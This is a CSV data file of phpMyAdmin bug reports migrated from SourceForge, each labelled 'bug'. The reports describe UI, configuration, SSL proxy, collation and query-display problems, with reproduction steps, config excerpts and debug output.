"24444","10724","Error in date picker while inserting date in a table.
When i insert date in a table in a date field of the table by clicking in the insert tab using the date picker when i click the next month or previous month button the date in the date box changes to 1899 12 31 but the month and year in the date picker not changes, but when i change the month again the the date becomes fine in the date box.
I am working on it.
Original URL https sourceforge.net p phpmyadmin bugs 4321 Original author abhinandan196 Found in version Latest Git","bug"
"24444","10725","setup scripts can t read write symlinked files.
Hi, I ve just updated my local instance from `4.0.9` to `4.1.9`, and I ve noticed that the setup scripts can t load my symlinked config file anymore It could in `4.0.9`) showing There are no configured servers .
Here is my directory tree phpMyAdmin 4.1.9 english | ... | config | config.inc.php | | config.inc.php symlink to config config.inc.php) ... On `4.0.9`, I was able to `load` my config file, make changes, `save` it and being able to use phpMyAdmin without trouble except red message telling me it s unsafe, but I don t care, it s local).
Now on `4.1.9` it seems that PMA can t load my config.
When I copy `config.inc.php` from ` config` to ` ` it seems to work.
I ve done some tests, and it seems that PMA is loading config from the root directory and is saving it to the config dir, and isn t able to read write symlinked files.
While on `4.0.9` I think it loads saves in the config dir.
Is it a bug not to be able to read write symlink files) or is it a feature and I will have to copy paste my files from back the config directory from now ?
Original URL https sourceforge.net p phpmyadmin bugs 4325 Original author axel50397 Found in version 4.1.9","bug"
"24444","10726","SSL redirects to port 80 when SSL proxy server is used.
After reading http sourceforge.net p phpmyadmin bugs 4120 , I can confirm that I am able to replicate this tracking the stable branch in Git.
I m using Nginx on HTTP only, with Pound providing HTTPS in front of Nginx.
Pound sends the X Forwarded For=https header.
I have Nginx sending HTTPS=on as a fastcgi param) to PHP FPM when X Forwarded For=https is set.
Despite this, upon logging in, I am redirected to https hostname.domain.tld 80 subfolder index.php?token=abcdef1234567890.
If I turn off Pound and use SSL natively in Nginx, the problem does not occur.
Relevant Nginx config map http x forwarded proto fastcgi https { default https; http ; https on; } ... location dbadmin { if fastcgi https != on ) { This redirect will occur before auth basic kicks in return 301 https host request uri; } auth basic Please enter your ID and password ; auth basic user file conf.d htpasswd; alias usr local share phpMyAdmin; index index.php; location dbadmin .
\.php) { include fastcgi params; fastcgi pass php www; document root comes from alias above, 1 from the parenthesis above fastcgi param SCRIPT FILENAME document root 1; } } My first thought was that I was logging in with https domain.tld dbadmin and not https domain.tld dbadmin index.php and the `fastcgi param HTTPS fastcgi https if not empty;` value from fastcgi params was not being sent because of the URI not containing .php, but the problem persists if I log in with index.php.
Here is the Pound config, sanitized for sharing User pound Group pound Control var lib pound pound.cfg ListenHTTPS Address 0.0.0.0 Port 443 Cert etc pki tls certs keyandallcerts.pem HeadRemove X Forwarded Proto AddHeader X Forwarded Proto https Apache Nginx Service BackEnd Address 127.0.0.1 Port 80 End End End As you can see, all it s doing is adding X Forwarded Proto.
Note that Pound, by default, also sends X Forwarded For and some other headers but it shouldn t necessarily be relevant here.
phpMyAdmin s config.inc.php is only modified to use an alternate socket path instead of `127.0.0.1 3306`.
PHP definitely sees that HTTPS=on due to the Nginx logic adding it via fastcgi params, but I suspect this is somehow due to how PMA detects the URL.
This is resolved by setting cfg[ PmaAbsoluteUri ] to https domain.tld dbadmin , but it would be nice if phpMyAdmin could handle X Forwarded Proto as it s pretty common for scenarios where HTTPS can t be run on the web server.
Original URL https sourceforge.net p phpmyadmin bugs 4621 Original author alanthing Found in version 4.2.13","bug"
"24444","10727","Cannot find the import plugins which start with uppercase I .
PhpMyAdmin cannot find the import plugins which start with uppercase I and displays error Could not load import plugins, please check your installation!
when Import tab clicked.
The bug 4001 flagged fixed but still exists.
Please re open and fix.
System Config Arch Linux w Kernel 3.13.6 1 ARCH 1 SMP PREEMPT Fri Mar 7 22 47 48 CET 2014 x86 64 GNU Linux Apache Httpd 2.4.7 2 PHP 5.5.10 1 phpMyAdmin 4.1.9 Original URL https sourceforge.net p phpmyadmin bugs 4326 Original author ongun kanat Found in version 4.1.11","bug"
"24444","10728","Incomplete PHP OpenSSL support.
As reported by Robert Scheck, in 4.3.0 there is still a dependency on phpseclib which the new feature wanted to avoid).
Original URL https sourceforge.net p phpmyadmin bugs 4623 Original author lem9 Found in version 4.3.0","bug"
"24444","10729","index.php Missing parameter import type.
I installed WAMP 2 weeks ago, and run their current version of phpMyAdmin.
phpMyAdmin Error index.php Missing parameter import type<a href= .
doc html faq.html faqmissingparameters target= documentation ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a> index.php Missing parameter format<a href= .
doc html faq.html faqmissingparameters target= documentation ><img src= themes dot.gif title= Documentation alt= Documentation class= icon ic b help >< a> What I did to find it log in run an SQL statement hand code query) let the session expire log back in hello ERROR!!!!!
Original URL https sourceforge.net p phpmyadmin bugs 4327 Original author q695 Found in version 4.0.4","bug"
"24444","10730","Testing submit report feature of Error Reporting server.
Hi, Just ignore this ticket.
It is being created to test submit report feature of Error Reporting server.
This report is related to user submitted report [ 10] http reports.phpmyadmin.net reports view 10) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4328 Original author mohamed ashraf Found in version 3.3.7","bug"
"24444","10731","mysql doc template is not defined.
Testing submit report This report is related to user submitted report [ 1572] http reports.phpmyadmin.net reports view 1572) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4329 Original author mohamed ashraf Found in version 4.1.5","bug"
"24444","10732","Uncaught TypeError Property getElementsByTagName of object is not a function.
Testing submit report Atul This report is related to user submitted report [ 1953] http reports.phpmyadmin.net reports view 1953) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4330 Original author mohamed ashraf Found in version 4.1.8","bug"
"24444","10733","no BZipDump support.
bz2 is installed and enabled, but phpMyAdmin does not offer bzip2 support for export compression.
Only none, zip and gzip are offered.
SLES 11 SP3, php 5.3.17 BZip2 Support Enabled Stream Wrapper support compress.bzip2 Stream Filter support bzip2.decompress, bzip2.compress BZip2 Version 1.0.5, 10 Dec 2007 openSUSE 13.1, php 5.4.20 BZip2 Support Enabled Stream Wrapper support compress.bzip2 Stream Filter support bzip2.decompress, bzip2.compress BZip2 Version 1.0.6, 6 Sept 2010 Original URL https sourceforge.net p phpmyadmin bugs 4331 Original author jimmik Found in version 4.1.8","bug"
"24444","10734","I can not type in sql screen.
I can not type in sql screen, can past and all it show are 1 6 on side do not see the query.
I does run OK is run pasted query.
Does this in IE, Chrome and Firefox, can past and all it show are 1 6 on side do not see the query.
I does run OK is run pasted query.
Does this in IE, Chrome and Firefox Original URL https sourceforge.net p phpmyadmin bugs 4333 Original author na7kr Found in version 4.1.9","bug"
"24444","10735","Add event datepicker won t open on click of execute at datepicker icon.
Steps to reproduce Select a database click at More > Events click at Add Event close the add event window Now again click at More > Events from top navigation bar Click at Add Event Click at datepicker icon, it wont opens datepicker.
I m using Firefox 28.0 for Ubuntu.
Same problem in Chromium as well.
Original URL https sourceforge.net p phpmyadmin bugs 4334 Original author smita786 Found in version 4.1.11","bug"
"24444","10736","reCaptcha problem.
reCaptcha stopped working at all after upgrading to 4.1.10 from 4.1.9.
It s not displayed and all login attempts fails with no error message login page just reloads).
Downgrading to 4.1.9 fixes the problem.
Original URL https sourceforge.net p phpmyadmin bugs 4335 Original author azurit Found in version 4.1.10","bug"
"24444","10737","4.3.3) AJAX request infinite loop.
Hello, we are using the same config as in 4.2.13.
After upgrading to 4.3.1 we have the following issue login with db user phpmyadmin homepage is shown as usual then a not ending AJAX request infinite loop is triggered till the browser crashes tested with Google Chrome and Mozilla Firefox) The request is sent to index.php, but it is not waited for the answer.
The same request is sent immediately again 50 per second in my case).
Here is some debug info Request Header <code>POST phpmyadmin43 index.php HTTP 1.1 Host [my.domain.com] User Agent Mozilla 5.0 Windows NT 6.1; WOW64; rv 33.0) Gecko 20100101 Firefox 33.0 Accept Accept Language de,en US;q=0.7,en;q=0.3 Content Type application x www form urlencoded; charset=UTF 8 X Requested With XMLHttpRequest Referer https [my.domain.com] phpmyadmin43 index.php?token=ffd6e14b84051747101c6e630ab13cca< code> POST Parameter of Request <code>ajax request true token ffd6e14b84051747101c6e630ab13cca db access time 0 nocache 1418119098597240700< code> Answer Header <code>HTTP 1.1 200 OK Server nginx Date Tue, 09 Dec 2014 09 58 18 GMT Content Type application json Transfer Encoding chunked Connection keep alive Vary Accept Encoding Expires Thu, 19 Nov 1981 08 52 00 GMT Last Modified Mon, 08 Dec 2014 17 34 16 GMT Set Cookie pma iv=zoHMj2vHL2AL1W 2BS4i6CHQ 3D 3D; expires=Thu, 08 Jan 2015 09 58 18 GMT; Max Age=2592000; path= phpmyadmin43 ; secure; httponly pmaUser 1=nJ4UzMohhLD6PxS 2FiHyv6Q 3D 3D; expires=Thu, 08 Jan 2015 09 58 18 GMT; Max Age=2592000; path= phpmyadmin43 ; secure; httponly pmaPass 1= 2F0wwAO6KxKsDP8Rq66TTRw 3D 3D; path= phpmyadmin43 ; secure; httponly X ob mode 0 Cache Control no cache Strict Transport Security max age=31536000< code> JSON answer <code>message <div id= maincontainer >...dort vorzunehmen.< div> success true title <title>[my.domain.com]...hpMyAdmin 4.3.1< title> menuHash 335d1f47 menu <div id= floating menuba...at >< div>< ul>\n< div>\n scripts [Object { name= jquery jquery 1.8.3.min.js , fire=0}, Object { name= sprintf.js , fire=1}, Object { name= ajax.js , fire=0}, 18 mehr...] selflink index.php?db= table= ser...4051747101c6e630ab13cca displayMessage errors <div class= clearfloat id= pma errors >< div> promptPhpErrors false reloadQuerywindow Object { db= , table= , sql query= } params Object { common query= ?token=ffd6e14b84051747101c6e630ab13cca , opendb url= db structure.php , safari browser=0, mehr...}< code> This request loops till the browser crashes with the same content again and again.
Best wishes Michael Original URL https sourceforge.net p phpmyadmin bugs 4630 Original author schattenfell Found in version 4.3.1","bug"
"24444","10738","List server css style wrong.
CSS file phpmyadmin.css.php has list server has list style image none; .
It wrong, should be list style type none; .
Additionally I recomend add text align left; to this id.
Original URL https sourceforge.net p phpmyadmin bugs 4336 Original author bulimaxiu Found in version 4.1.11","bug"
"24444","10739","Error reporting creates an infinite loop.
A possible duplicate of https sourceforge.net p phpmyadmin bugs 4630 Original URL https sourceforge.net p phpmyadmin bugs 4634 Original author madhuracj Found in version 4.3.0","bug"
"24444","10740","More in Actions area doesn t collapse to fit available space.
In olden times, when there were too many Actions as viewed from the table structure page), the remaining actions would collapse under a More dropdown.
That no longer happens.
The main tabs appear unaffected by this Browse, Structure, etc) and continue to show More as expected.
According to git bisect 7efd0bd3c97eb14ebcc6987a8a50837571a6f809 is the first bad commit Original URL https sourceforge.net p phpmyadmin bugs 4337 Original author ibennetch Found in version 4.1.11","bug"
"24444","10741","Executing queries in SQL tab broken.
1.
Open the SQL tab in a database or table 2.
Enter some SQL in the textfield 3.
Hit OK 4.
Alert box says Missing value in the form Original URL https sourceforge.net p phpmyadmin bugs 4338 Original author rm km it Found in version Latest Git","bug"
"24444","10742","please update sourceforge default download to latest version.
4.1.11 is default for Windows but for all other plattforms it is 4.0.9 would like to download from linux using http sourceforge.net projects phpmyadmin files latest download solution http stackoverflow.com questions 6777327 how to manually set the default download file in a sourceforge project Original URL https sourceforge.net p phpmyadmin bugs 4339 Original author dhaneshvar Found in version 4.1.11","bug"
"24444","10743","Error pop up on all SQL queries Missing value in the form!.
Server platform Linux Debian) Client platform Windows 7 with IE 11 PHPMyAdmin version 4.1.11 Description I cannot execute any SQL queries.
Even when the form is blank, if I click Go , I immediately receive an error pop up with the message Missing value in the form!
.
This does not occur with 4.1.5, on the same server client systems.
Original URL https sourceforge.net p phpmyadmin bugs 4340 Original author fmlight Found in version 4.1.11","bug"
"24444","10744","When using translation, header of mo file is displayed DB > Structure view.
See screenshot.
Using translation for English Great Britain) here, but happens with every locale Original URL https sourceforge.net p phpmyadmin bugs 4341 Original author rm km it Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4341 attachment Bildschirmfoto 20vom 202014 03 27 2014 3A35 3A37.png","bug"
"24444","10745","Codemirror produces Missing value in form!
error on Firefox 27.0.1.
This bug http sourceforge.net p phpmyadmin bugs 4323 is still present in 4.1.11 in Firefox 27.0.1 and possibly other browsers.
I am experiencing the same error as that bug reports, and the behaviour is fixed after turning off Codemirror, as described in that report.
Julian Original URL https sourceforge.net p phpmyadmin bugs 4342 Original author jegelstaff Found in version 4.1.11","bug"
"24444","10746","URL detected incorrectly after clicking Apply on the Settings pages.
The URL for phpMyAdmin that we are using has a port number, and I suspect that the port number is not being anticipated or read properly by some code somewhere, because when we click Apply on any of the Settings pages ie Features, SQL Queries, etc), the page reloads and the URL starts with simply https 8443 The settings are saved, so this appears to just be a problem with where how the current URL is being detected to act as the action of the form, or some other redirection as part of the ajax submission.
Julian Original URL https sourceforge.net p phpmyadmin bugs 4343 Original author jegelstaff Found in version 4.1.11","bug"
"24444","10747","Weird values on table overview.
Hi there!
Table overview is behaving bizarre since we were forced to update to MariaDB on Synology.
Data werten t lost, but the table overview shows weird values.
These values aren t shown anymore once you open an insert.
To understand, check the both files attached.
Overview shows the weird value, and the second one shows the insert itself once openend, where the values are correct.
I m running 4.1.12 and server is 5.5.34 MariaDB Source distribution Original URL https sourceforge.net p phpmyadmin bugs 4344 Original author psychokiller188 Found in version 4.1.12 Attachment http sourceforge.net p phpmyadmin bugs 4344 attachment data.PNG Attachment http sourceforge.net p phpmyadmin bugs 4344 attachment overview.PNG","bug"
"24444","10748","Privileges editor shows databases with underscore backslash escaped.
For database names with an underscore, the Privileges editor database specific rights box) escapes the underscores with backslashes.
Original URL https sourceforge.net p phpmyadmin bugs 4345 Original author zweisteinsoft Found in version 4.1.12","bug"
"24444","10749","Error when browsing tables.
Everytime I try to browse a table I get an error Some errors have been detected on the server!
Please look at the bottom of this window.
I click Ignore All or Ignore and I can see the results from the table or edit the table.
See the error bellow Notice in .
libraries Util.class.php 1823 Undefined offset 1 Backtrace .
libraries Util.class.php 1277 PMA Util linkOrButton string , string Inline , array, ) .
libraries DisplayResults.class.php 4552 PMA Util getMessage object, string SELECT FROM `vizite` , string success , ) .
libraries sql.lib.php 1963 PMA DisplayResults >getTable object, string urdr111111 , array, ) .
libraries sql.lib.php 2220 PMA getHtmlForSqlQueryResultsTable NULL, object, string escortereale , string , string .
themes pmahomme img , NULL, string urdr111101 , string LIMIT 0, 25 , boolean true, string 26384 , integer 25, NULL, object, array, ) You also have an attached print screen!
I haven t had this problem in the past, but it appeared as soon as I upgraded to phpmyadmin 4.3.1.
My server is running CentOS 5.11 Final) 64bits, mysql serer 5.5.41 cll lve, PHP 5.4.33 cli) built Sep 20 2014 16 31 22) and apache 2.2.29 Original URL https sourceforge.net p phpmyadmin bugs 4644 Original author bsm33 Found in version 4.3.1 Attachment http sourceforge.net p phpmyadmin bugs 4644 attachment phpmyadim 4.3.1.JPG","bug"
"24444","10750","Incorrect Export incomplete message.
Suddenly, exporting started to display this error IMMEDIATELY after clicking on Go button Your export is incomplete, due to a low execution time limit at the PHP level The exported file is NOT incomplete.
Even more, after this happens, every other action in the GUI results into this error Error Token mismatch Full page reload or relogin fixes the token problem.
Original URL https sourceforge.net p phpmyadmin bugs 4346 Original author azurit Found in version 4.1.12","bug"
"24444","10751","Can t disable Favorites.
I ve set Favorite tables to 0 but the Favorites star still shows up in the list of tables.
Why is this setting in Features General and not in Nav panel?
Original URL https sourceforge.net p phpmyadmin bugs 4647 Original author olafvdspek Found in version 4.3.2","bug"
"24444","10752","PHP Parse error in Advisor.
Clicking on Advisor link produces 500 error apache error log contains PHP Parse error syntax error, unexpected , in var www html phpMyAdmin 4.1.12 all languages libraries Advisor.class.php 343) eval ) d code on line 1 ... PHP version 5.0.4 MySQL 4.1.11 2 apache 2.0.54 10.4 running 64bit CentOS 6.5 firefox 27.0.1 Original URL https sourceforge.net p phpmyadmin bugs 4347 Original author khall Found in version 4.1.12","bug"
"24444","10753","Missing value in the form error with sql query editor.
Select any database and table, click SQL tab.
The query editor will show up with a pre defined query like SELECT FROM `cds` WHERE 1 Hit Ctrl Enter or click Go, `Missing value in form` popup comes up.
Select a portion of the query statement and try again, it should work now.
Video http youtu.be y0NgcHbXkYI Original URL https sourceforge.net p phpmyadmin bugs 4348 Original author codemanx Found in version Latest Git","bug"
"24444","10754","Unknown collation utf8mb4 general ci .
Hello, i just stumbled upon this error with my installation of phpmyadmin in version 4.1.12 with a remote connection to two of my mysql installations on MySQL version 5.1.66 community log and 5.0.18.
Remote connection to servers with newer mysql versions like 5.5.32 MySQL Community Server 5.5.28 log MySQL Community Server 5.5.27 MySQL Community Server 5.6.11 log MySQL Community Server working great.
If i try a stone old phpmyadmin version like 2.11.11.1 it works with 5.1.66 community log and 5.0.18.
Can you please fix that or tell my a workaround?
Thanks in advance.
regards, Christian Original URL https sourceforge.net p phpmyadmin bugs 4349 Original author lordprotector Found in version 4.1.12","bug"
"24444","10755","Deleting the DB if it is renamed by the same name.
Si l on renomme la DB par le mxc3xa9me nom, la DB est alors supprimer totalement.
Cela peut xc3xaatre plutot dangereux si l on fait cela par inadvertance.
Original URL https sourceforge.net p phpmyadmin bugs 4350 Original author sitexw2 Found in version 4.1.12","bug"
"24444","10756","problem in form SQL.
this query should work GRANT USAGE ON .
TO gg ; DROP USER gg ; got a popup JS Missing value in the form!
maybe to prevent create user without password ?
Original URL https sourceforge.net p phpmyadmin bugs 4351 Original author aurelienlequoy Found in version 4.1.10","bug"
"24444","10757","Settings > Manage incorrect messages.
See the explanation and fix at https github.com phpmyadmin phpmyadmin pull 1125 Original URL https sourceforge.net p phpmyadmin bugs 4352 Original author lem9 Found in version 4.1.12","bug"
"24444","10758","Uncaught ReferenceError makeProfilingChart is not defined.
Go to table browse page => check Profile checkbox => go to some other tab => refresh => click on browse again => See makeProfilingChart is not defined http reports.phpmyadmin.net reports view 1973 Other related error reports 1893,1899,1909,1910,1972,1973,1974 Original URL https sourceforge.net p phpmyadmin bugs 4353 Original author atul5 Found in version 4.1.12","bug"
"24444","10759","Wrong Server Being Selected..
I have two Server Configured in PMA a Master and a Slave Replicating from a Master.
If I select my Slave server from the drop down box everything responds as if run on the main Server.
Both Servers report the same replication status, variables and if you run SQL queries they all come back as if run on the master server.
select hostname; show variables where Variable name like host ; For example shows the incorrect server has responded to the query.
Original URL https sourceforge.net p phpmyadmin bugs 4354 Original author ukunplugged Found in version 4.1.9","bug"
"24444","10760","GROUPed selects show number of rows as if not grouped.
CREATE TABLE IF NOT EXISTS `test` `id` int 11) NOT NULL, `test` varchar 100) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=3 ; INSERT INTO `test` `id`, `test`) VALUES 1, 1 ), 2, 1 ); SELECT FROM `test` GROUP BY test This query yields one row, but the message above the table says there are 2 rows.
This also affects the calculation of the number of pages, so you can go to pages that don t actually exist.
Original URL https sourceforge.net p phpmyadmin bugs 4356 Original author rm km it Found in version 4.1.12 Attachment http sourceforge.net p phpmyadmin bugs 4356 attachment Bildschirmfoto 20vom 202014 04 09 2010 3A43 3A10.png","bug"
"24444","10761","JS Form submitted on enter even if focus is inside a select field.
Go to a table, edit an index.
A JS Box is shown with possible columns shown.
e.g.
select the last one ignore) type a letter for selecting the column.
The select box is expanded, maybe use arrow keys.
Press Enter to select the current entry.
Not the entry is selected, but the JS Form is submitted!
On big tables, this makes it very hard to select find columns, you have always to use the mouse to select the col.
In phpmyadmin 3.x the solution without JS was much better.
I think this is true for dialogs, but this one was obvious after upgrade.
Original URL https sourceforge.net p phpmyadmin bugs 4357 Original author mokraemer Found in version 4.1.8","bug"
"24444","10762","Can t change font size when config.inc.php not present).
phpMyAdmin 4.1.12 Server Localhost via UNIX socket PHP 5.4.16 MySQL 5.5.28 Firefox 22.0 My Plesk server was recently upgraded from phpMyAdmin 3.5.8.2 to 4.1.12, and I hate the larger font size.
I tried changing it in the Appearance Settings.
However, no matter what I select, the page reloads with the exact same font size and the select box is reset to 82 .
Original URL https sourceforge.net p phpmyadmin bugs 4361 Original author toxalot Found in version 4.2.5","bug"
"24444","10763","Adding index to column by button in structure view shows wron dialog.
1.
Go to the structure tab of a table 2. click on the button Index in one of the rows 3.
The dialog Edit Index opens in front of the Do you really want... confirm, you have to click cancel Original URL https sourceforge.net p phpmyadmin bugs 4362 Original author rm km it Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4362 attachment Bildschirmfoto 20vom 202014 04 11 2013 3A52 3A13.png","bug"
"24444","10764","Plugin interface should be locale aware.
Last month I ve reported bug https sourceforge.net p phpmyadmin bugs 4326 .
In my daily usage of phpMyAdmin I ve detected the all toupper and tolower operations in libraries plugin interface.lib.php are using standart strtoupper and strtolower.
But they does not work in non ASCII systems such as Turkish in my case.
The mbstring plugin of PHP is very useful in this cases.
It successfully converts strings to upper and lowercases.
As a solution I reccomend usage of mb strtoupper and mb strtolower functions instead of strtoupper and strtolower.
Original URL https sourceforge.net p phpmyadmin bugs 4363 Original author ongun kanat Found in version 4.1.12","bug"
"24444","10765","examples signon.php does not support the SessionSavePath directive.
If cfg[ SessionSavePath ] in config.inc.php) is not null, examples signon.php will always auth failed.
Reason SignonSession is saved in default) tmp; libraries plugins auth AuthenticationSignon.class.php will load SignonSession from cfg[ SessionSavePath ].
Solution add require once common.inc.php ; or require once session.inc.php ; or something like session save path cfg[ SessionSavePath ]); to examples signon.php before session start )).
Original URL https sourceforge.net p phpmyadmin bugs 4364 Original author douyuan Found in version 4.1.12","bug"
"24444","10766","Drag and drop file import always fails..
I used the Chrome feature where I could drop a file on to a file upload input field, and it would automatically fill in the field with the file I dropped on it.
Now that PMA has the drag and drop feature to upload import files, I can longer use that feature of Chrome.
The problem wouldn t be so bad, except that the drag and drop feature of PMA always fails.
It can never upload the file.
Here is the JSON returned from the import.php request { success false, error \n<!
PMA SQL ERROR >\n <div class=\ error\ ><h1>Error<\ h1>\n<p><strong>SQL query <\ strong>\n<a href=\ db sql.php?sql query=SET NAMES 27utf 8 27 amp;show query=1 amp;db=favred amp;token=9bbccdf3a8375e35ad9e5091aa31068d\ ><span class=\ nowrap\ ><img src=\ themes\ dot.gif\ title=\ Edit\ alt=\ Edit\ class=\ icon ic b edit\ \ > Edit<\ span><\ a> <\ p>\n<p>\n<code class=\ sql\ ><pre>\nSET NAMES utf 8 \n<\ pre><\ code>\n<\ p>\n<p>\n <strong>MySQL said <\ strong><a href=\ .\ url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.6 2Fen 2Ferror messages server.html\ target=\ mysql doc\ ><img src=\ themes\ dot.gif\ title=\ Documentation\ alt=\ Documentation\ class=\ icon ic b help\ \ ><\ a>\n<\ p>\n<code>\n 1115 Unknown character set utf 8 \n<\ code><br \ >\n<\ div> } The file I am trying to drag and drop is an export file from a previous version of PMA.
I m not sure why the importer works when I use the form field normally, and fails when using the drag and drop upload.
But it seems that if my server understands UTF 8 in one case, it should understand it in another.
Anywho... if you need anymore information from me, please don t hesitate to ask.
Windows 7 64 PHP 5.6.3 MySQL 5.6.20 log Original URL https sourceforge.net p phpmyadmin bugs 4661 Original author benjamwelker Found in version 4.3.2","bug"
"24444","10767","Creating bookmark with multiple queries not working.
I like having a bookmark to truncate several tables at once for testing purposes.
However if I try to save a book mark that contains more than one query from the SQL tab, it isn t saved.
Original URL https sourceforge.net p phpmyadmin bugs 4365 Original author rm km it Found in version 4.1.13","bug"
"24444","10768","select min ) displays 1 row, but reports the table amount of rows returned.
I just did SELECT min field) FROM table WHERE 1 .
What I ended up with was Showing rows 0 249 171263438 total, Query took ...) And the result showed 1 row.
So this count is clearly wrong.
No problem for the usage.
Just thought to report it.
Original URL https sourceforge.net p phpmyadmin bugs 4664 Original author g00fy Found in version 4.3.3 Attachment http sourceforge.net p phpmyadmin bugs 4664 attachment Clipboard01.jpg","bug"
"24444","10769","Creating Index doesn t update index list.
go to structure tab, add an index by clicking e.g.
Index Icon.
If you unfold indexes at bottom an show them, the new created index is not shown unless you reload the structure page.
This is not obvious, since in 3.x versions structure page is reloaded on every change, so the index fold is always up to date.
Original URL https sourceforge.net p phpmyadmin bugs 4366 Original author mokraemer Found in version 4.1.12","bug"
"24444","10770","Import status infinite loop.
Bug in script import status.php at line 80 wait until message is available while SESSION[ Import message ][ message ] == null) { usleep 250000); 0.25 sec } This create a neverending loop, becouse session isn t accessible by another process.
So the solution is close and reopen sessions like this wait until message is available counter = 0; while SESSION[ Import message ][ message ] == null) { a ; session write close ); usleep 1000000); 1.00 sec session start ); if counter>20) { SESSION[ Import message ][ message ] = TIMEOUT ; Break; } } Original URL https sourceforge.net p phpmyadmin bugs 4367 Original author lewancz Found in version 4.1.13","bug"
"24444","10771","Recent Favorite tables persist even if they don t exist..
While creating a new table from DB Structure page, it starts to appear in Recent tables list before its actually created.
Steps 1) Click on any database name from Navi panel.
2) Enter table in Create table section at bottom and click Go .
Now you arrive at actual Table create page and up to now the table isn t really created and it starts to appear in Recent tables list and it persists even if you discard the table by clicking on any other link.
Also, these entries both Favorites and Recent) persists in a normal scenario even if you DROP that table.
Original URL https sourceforge.net p phpmyadmin bugs 4368 Original author ashut0sh Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4368 attachment tbl create page.png","bug"
"24444","10772","CONCAT in query returns wrong results.
Please consider the following table and data CREATE TABLE `test` `testcol` mediumint 6) NOT NULL, PRIMARY KEY `testcol`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; INSERT INTO `test` `testcol`) VALUES 1 ), 2 ), 3 ); The following query seems to return wrong results SELECT CONCAT testcol), testcol FROM `test` WHERE 1; CONCAT testcol) testcol 31 1 32 2 33 3 Running the query directly in MySQL s command line client returns the expected results.
The results should be CONCAT testcol) testcol 1 1 2 2 3 3 Versions phpMyAdmin 4.1.13 MySQL 5.1.66 0 squeeze1 log PHP 5.3.3 7 squeeze15 Apache 2.2.16 6 squeeze11 OS Debian 6.0.7 2.6.32 5 amd64) Original URL https sourceforge.net p phpmyadmin bugs 4369 Original author deewde Found in version 4.1.13","bug"
"24444","10773","Searching tables persists across databases.
All of these steps occur in the side bar and involves 2 databases.
The first database must have enough tables that you get the option to search them when clicked on in the side bar.
The second database must not have enough to have the table search field when you click on it in the side bar.
Go to the first database, open its table list, and enter something in the search field.
Then go to the second database and open its table list you will notice the search has been applied to that database as well unfortunately since there aren t enough tables in this DB to give you a search field you cannot perform another search to recover them you have to refresh the page.
My suggested fix would be either ensure that the search only applies to the database its for OR always display a search field so you can at least search for the table you can t see.
Original URL https sourceforge.net p phpmyadmin bugs 4370 Original author rpalackas Found in version 4.1.12","bug"
"24444","10774","Navi expansion on the db name works only once.
In the navi panel click on a db name to expand it click on to collapse it try again to expand it by click on its name Original URL https sourceforge.net p phpmyadmin bugs 4371 Original author lem9 Found in version 4.1.13","bug"
"24444","10775","Changing browser transformation results in unnecessary table rebuild.
If I change the browser transformation options on a field, it acts as if I had done a real modification to a field, causing a table rebuild.
This is unnecessary since the transformation is purely a phpMyAdmin feature, nothing to do with the underlying table, so it should detect when no real changes have been made and only make changes in the PMA database.
Alternatively, the ability to change transformation should be moved out of the field editor.
Original URL https sourceforge.net p phpmyadmin bugs 4372 Original author coolbru Found in version 4.1.13","bug"
"24444","10776","1273 Unknown collation utf8mb4 slovak ci .
Hi, i have a problem with error 1273 Unknown collation.
I run PhpMyAdmin under newer 5.6 server version that has the support collation utf8mb4, but if I switch to an older server 5.1) that doesn t have support utf8mb4, jumped mi this message 1273 Unknown collation utf8mb4 slovak ci .
Browser Firefox Original URL https sourceforge.net p phpmyadmin bugs 4374 Original author janveres Found in version 4.1.13 Attachment http sourceforge.net p phpmyadmin bugs 4374 attachment Pictures3.JPG Attachment http sourceforge.net p phpmyadmin bugs 4374 attachment Pictures2.JPG Attachment http sourceforge.net p phpmyadmin bugs 4374 attachment Pictures1.JPG","bug"
"24444","10777","Group two DB, one s name is the prefix of the other one.
When you create 2 DB my my test I expect to have a group my with children my my test But there is no group and both DB are displayed at first level.
If another DB my <something> is created, they are grouped.
Original URL https sourceforge.net p phpmyadmin bugs 4375 Original author tithugues Found in version 4.1.13","bug"
"24444","10778","Login fields show in separate line.
For config authentication, the username and password input fields may wrap to separate lines below their labels, instead of staying on the right of them.
Affected Mozilla Firefox on Ubuntu Google Chrome on Ubuntu Reason The form field width is currently controlled by the .
parameter.
The translation of character counts to pixels depends on the font used for the input field.
On Windows hosts, no wrapping is happening.
Solution Force the width of the login form input fields by CSS to create a uniform experience across user browsers.
Original URL https sourceforge.net p phpmyadmin bugs 4376 Original author zweisteinsoft Found in version 4.1.13","bug"
"24444","10779","Server Export Ignore Databases Select Value.
As Title , Server Export Ignore Databases Select Value, It always Export All Original URL https sourceforge.net p phpmyadmin bugs 4377 Original author ffchung2002 Found in version 4.1.13","bug"
"24444","10780","Database filter and pages other than the current one.
Since d74ac17, the database filter no longer finds a database that is not on the current page.
See https github.com phpmyadmin phpmyadmin pull 1129.
Original URL https sourceforge.net p phpmyadmin bugs 4378 Original author lem9 Found in version Latest Git","bug"
"24444","10781","Composite index created instead of individual.
When adding more than 1 column to a table and selecting the same index options for each column, phpMyAdmin creates a composite index instead of two separate indices as expected.
Original URL https sourceforge.net p phpmyadmin bugs 4379 Original author jongoodger Found in version 4.1.12","bug"
"24444","10782","Cannot display table structure with enums containing special characters.
create the following table CREATE TABLE `rdShopItems` `ID` int 10) unsigned NOT NULL AUTO INCREMENT, `GefahrGesund` enum , Sehr giftig , Giftig , Gesundheitsschxc3xa4dlich ) COLLATE latin1 german1 ci NOT NULL, `GefahrReiz` enum , xc3x84tzend , Reizend ) COLLATE latin1 german1 ci NOT NULL, `GefahrUmwelt` enum , Umweltgefxc3xa4hrlich ) COLLATE latin1 german1 ci NOT NULL, PRIMARY KEY `ID`) ) ENGINE=MyISAM table creation is correct, if you try to select the table you get Error, Code 200, Ok .
